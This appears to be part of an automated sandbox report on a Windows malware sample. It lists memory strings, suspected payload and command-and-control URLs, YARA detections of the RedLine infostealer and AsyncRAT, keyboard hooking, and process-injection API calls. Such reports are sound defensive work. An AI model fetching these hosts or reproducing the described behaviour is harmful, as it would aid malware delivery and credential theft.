Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dwrqljrr.biz/
Source: alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nqwjmb.biz/
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tbjrpv.biz/k7/pV
Source: x.exe, 00000004.00000002.1593299514.000000007F670000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000000.1470846029.0000000000401000.00000020.00000001.01000000.00000004.sdmp, esentutl.exe, 0000000A.00000003.1539123679.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.delphiexpert.ru
Source: x.exe, 00000004.00000002.1593299514.000000007F670000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000000.1470846029.0000000000401000.00000020.00000001.01000000.00000004.sdmp, esentutl.exe, 0000000A.00000003.1539123679.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.delphiexpert.ruopenSV
Source: x.exe, x.exe, 00000004.00000002.1544141056.0000000000780000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478142210.0000000002959000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1596172530.000000007FE2F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1588992126.0000000021CF5000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478393290.000000007FBDF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1555508277.000000000295A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1588565232.0000000021AF0000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000000.1541408812.0000000000416000.00000002.00000001.01000000.00000007.sdmp, wdmvmswJ.pif, 0000001E.00000000.1659150073.0000000000416000.00000002.00000001.01000000.00000007.sdmp, wdmvmswJ.pif, 00000026.00000000.1748296146.0000000000416000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.pmail.com
Source: wdmvmswJ.pif, 0000000C.00000003.2071578798.0000000020950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chichometextiles.com/
Source: x.exe, 00000004.00000002.1582582313.00000000208DD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chichometextiles.com/wp-
Source: x.exe, 00000004.00000002.1582582313.00000000208EC000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.000000000072F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.00000000208C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chichometextiles.com/wp-admin/233_Jwsmvmdweya
Source: x.exe, 00000004.00000002.1544141056.00000000006BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chichometextiles.com/wp-admin/233_JwsmvmdweyaM
Source: x.exe, 00000004.00000002.1544141056.000000000072F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chichometextiles.com:443/wp-admin/233_Jwsmvmdweyah
Source: wdmvmswJ.pif, 0000000C.00000003.2111219568.0000000020950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49707 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\wdmvmswJ.pif

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 38.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 30.2.wdmvmswJ.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 30.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 30.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 30.2.wdmvmswJ.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 38.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 38.2.wdmvmswJ.pif.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 38.2.wdmvmswJ.pif.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000026.00000001.1748961423.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000001E.00000001.1659980996.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000001E.00000002.1740115481.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000026.00000002.1813978225.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen

Abnormal high CPU Usage

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B08670 NtUnmapViewOfSection,	4_2_02B08670
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B08400 NtReadVirtualMemory,	4_2_02B08400
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B07A2C NtAllocateVirtualMemory,	4_2_02B07A2C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	4_2_02B0DC8C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_02B0DC04
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B08D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_02B08D70
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	4_2_02B0DD70
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B07D78 NtWriteVirtualMemory,	4_2_02B07D78
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B07A2A NtAllocateVirtualMemory,	4_2_02B07A2A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_02B0DBB0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B08D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_02B08D6E
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00024823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	13_2_00024823
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0002643A NtOpenThreadToken,NtOpenProcessToken,NtClose,	13_2_0002643A
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00037460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	13_2_00037460
Source: C:\Users\Public\alpha.pif	Code function: 13_2_000264CA NtQueryInformationToken,	13_2_000264CA
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00026500 NtQueryInformationToken,NtQueryInformationToken,	13_2_00026500
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0003A135 NtSetInformationFile,	13_2_0003A135
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0003C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	13_2_0003C1FA
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00014E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,	13_2_00014E3B
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00024759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,	13_2_00024759
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00024823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	17_2_00024823
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0002643A NtOpenThreadToken,NtOpenProcessToken,NtClose,	17_2_0002643A
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00037460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	17_2_00037460
Source: C:\Users\Public\alpha.pif	Code function: 17_2_000264CA NtQueryInformationToken,	17_2_000264CA
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00026500 NtQueryInformationToken,NtQueryInformationToken,	17_2_00026500
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0003A135 NtSetInformationFile,	17_2_0003A135
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0003C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	17_2_0003C1FA
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00014E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,	17_2_00014E3B
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00024759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,	17_2_00024759
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029C8670 NtUnmapViewOfSection,	27_2_029C8670
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029C8400 NtReadVirtualMemory,	27_2_029C8400
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029C7A2C NtAllocateVirtualMemory,	27_2_029C7A2C
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029C7D78 NtWriteVirtualMemory,	27_2_029C7D78
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029C8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	27_2_029C8D70
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029CDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	27_2_029CDD70
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029C86F7 NtUnmapViewOfSection,	27_2_029C86F7
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029C7AC9 NtAllocateVirtualMemory,	27_2_029C7AC9
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029C7A2A NtAllocateVirtualMemory,	27_2_029C7A2A
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029CDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	27_2_029CDBB0
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029CDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	27_2_029CDC8C
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029CDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	27_2_029CDC04
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029C8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	27_2_029C8D6E
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029E8670 NtUnmapViewOfSection,	36_2_029E8670
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029E8400 NtReadVirtualMemory,	36_2_029E8400
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029E7A2C NtAllocateVirtualMemory,	36_2_029E7A2C
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029E7D78 NtWriteVirtualMemory,	36_2_029E7D78
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029E8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	36_2_029E8D70
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029EDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	36_2_029EDD70
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029E86F7 NtUnmapViewOfSection,	36_2_029E86F7
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029E7AC9 NtAllocateVirtualMemory,	36_2_029E7AC9
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029E7A2A NtAllocateVirtualMemory,	36_2_029E7A2A
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029EDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	36_2_029EDBB0
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029EDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	36_2_029EDC8C
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029EDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	36_2_029EDC04
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029E8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	36_2_029E8D6E

Contains functionality to communicate with device drivers

Source: C:\Users\Public\alpha.pif

13_2_00014C10

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B08788 CreateProcessAsUserW,

4_2_02B08788

Creates files inside the system directory

Source: C:\Users\Public\alpha.pif	File created: C:\Windows
Source: C:\Users\Public\alpha.pif	File created: C:\Windows \SysWOW64
Source: C:\Windows\System32\alg.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\b2310dff430b0ac5.bin

Deletes files inside the Windows folder

Source: C:\Users\Public\alpha.pif

File deleted: C:\Windows \SysWOW64

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AF20C4	4_2_02AF20C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AFC98E	4_2_02AFC98E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AFC9DE	4_2_02AFC9DE
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00408C60	12_1_00408C60
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_0040DC11	12_1_0040DC11
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00407C3F	12_1_00407C3F
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00418CCC	12_1_00418CCC
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00406CA0	12_1_00406CA0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_004028B0	12_1_004028B0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_0041A4BE	12_1_0041A4BE
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00418244	12_1_00418244
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00401650	12_1_00401650
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00402F20	12_1_00402F20
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_004193C4	12_1_004193C4
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00418788	12_1_00418788
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00402F89	12_1_00402F89
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00402B90	12_1_00402B90
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_004073A0	12_1_004073A0
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0001540A	13_2_0001540A
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00014C10	13_2_00014C10
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00024875	13_2_00024875
Source: C:\Users\Public\alpha.pif	Code function: 13_2_000174B1	13_2_000174B1
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00019144	13_2_00019144
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0003695A	13_2_0003695A
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00034191	13_2_00034191
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0001EE03	13_2_0001EE03
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00017A34	13_2_00017A34
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00016E57	13_2_00016E57
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0001D660	13_2_0001D660
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00033E66	13_2_00033E66
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00025A86	13_2_00025A86
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0003769E	13_2_0003769E
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00023EB3	13_2_00023EB3
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00024EC1	13_2_00024EC1
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00016B20	13_2_00016B20
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00020740	13_2_00020740
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00020BF0	13_2_00020BF0
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0001540A	17_2_0001540A
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00014C10	17_2_00014C10
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00024875	17_2_00024875
Source: C:\Users\Public\alpha.pif	Code function: 17_2_000174B1	17_2_000174B1
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00019144	17_2_00019144
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0003695A	17_2_0003695A
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00034191	17_2_00034191
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0001EE03	17_2_0001EE03
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00017A34	17_2_00017A34
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00016E57	17_2_00016E57
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0001D660	17_2_0001D660
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00033E66	17_2_00033E66
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00025A86	17_2_00025A86
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0003769E	17_2_0003769E
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00023EB3	17_2_00023EB3
